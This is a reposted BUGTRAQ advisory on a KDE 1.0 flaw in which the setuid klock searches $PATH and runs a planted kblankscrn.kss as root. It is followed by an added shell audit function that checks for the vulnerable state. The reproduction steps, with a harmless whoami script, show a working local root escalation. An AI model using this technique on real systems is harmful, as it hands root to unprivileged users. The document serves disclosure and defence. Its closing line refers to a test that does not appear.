On the BUGTRAQ mailing list, HD
Moore writes:
--( the problem )--

The SUID program klock shipped with KDE 1.0 attempts to execute kblankscrn.kss in the same directory as it. If kblankscrn.kss cannot be executed (missing or mode -x) then klock will search the current user's $PATH for any executable with the same name and execute it as ROOT. If no executable is found in the current path it gives this message:

> Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin

Default modes for klock and kblankscrn.kss are:

-rwsr-xr-x 1 root root 8760 Mar 12 1998 /opt/kde/bin/klock
-rwsr-xr-x 1 root root 43600 Mar 12 1998 /opt/kde/bin/kblankscrn.kss

Systems Affected: any system that runs KDE 1.0

____________________________________________________

--( the exploit )--

This is only exploitable if any of the following occurs:

1) klock is moved to another directory
2) kblankscrn.kss is moved to another directory
3) kblankscrn.kss is not executable

To see if you are vulnerable...

1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss
2) login as a normal user
3) create a shell script that looks like:

#!/bin/sh
echo Running script as `whoami`!
exit

4) name this script kblankscrn.kss and mv it to your home directory.
5) execute /opt/kde/bin/klock, you should see:

user@hostname:/home/user> /opt/kde/bin/klock
user@hostname:/home/user> Running script as root!

6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss

____________________________________________________

--( the fix )--

chmod 700 /opt/kde/bin/klock or wait until KDE is updated.

The KDE buglist has been notified.
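An audit check for the condition the advisory describes, added here as an example and not part of the original post: it reports whether a setuid klock could reach the $PATH fallback because its helper is missing or not executable. The function name check_klock and the KDE_BIN variable are assumptions; the directory defaults to the advisory's /opt/kde/bin.

```shell
#!/bin/sh
# check_klock DIR
#   Prints a finding and returns 0 when the layout is safe, 1 when an
#   unprivileged user running DIR/klock would trigger the $PATH search
#   for kblankscrn.kss described in the advisory.
check_klock() {
    dir=$1
    klock="$dir/klock"
    kss="$dir/kblankscrn.kss"

    if [ ! -e "$klock" ]; then
        echo "ok: $klock not present"
        return 0
    fi

    # Setuid bit plus other-execute (-perm -4001): any local user can run
    # klock with root privileges. Without both, the fallback is harmless.
    if [ -z "$(find "$klock" -prune -perm -4001 2>/dev/null)" ]; then
        echo "ok: $klock is not setuid and world-executable"
        return 0
    fi

    # The advisory's own fix: mode 700 removes the setuid bit and
    # stops other users from running klock at all.
    if [ ! -e "$kss" ]; then
        echo "VULNERABLE: $kss missing; klock would search \$PATH as root"
        echo "fix: chmod 700 $klock"
        return 1
    fi
    if [ ! -x "$kss" ]; then
        echo "VULNERABLE: $kss not executable; klock would search \$PATH as root"
        echo "fix: chmod 700 $klock"
        return 1
    fi

    echo "ok: setuid $klock finds an executable helper at $kss"
    return 0
}

# Stand-alone use: KDE_BIN overrides the advisory's default location.
check_klock "${KDE_BIN:-/opt/kde/bin}"
```

The test below builds a throwaway directory that mimics the advisory's default modes, then the mode-600 helper case and the chmod 700 fix.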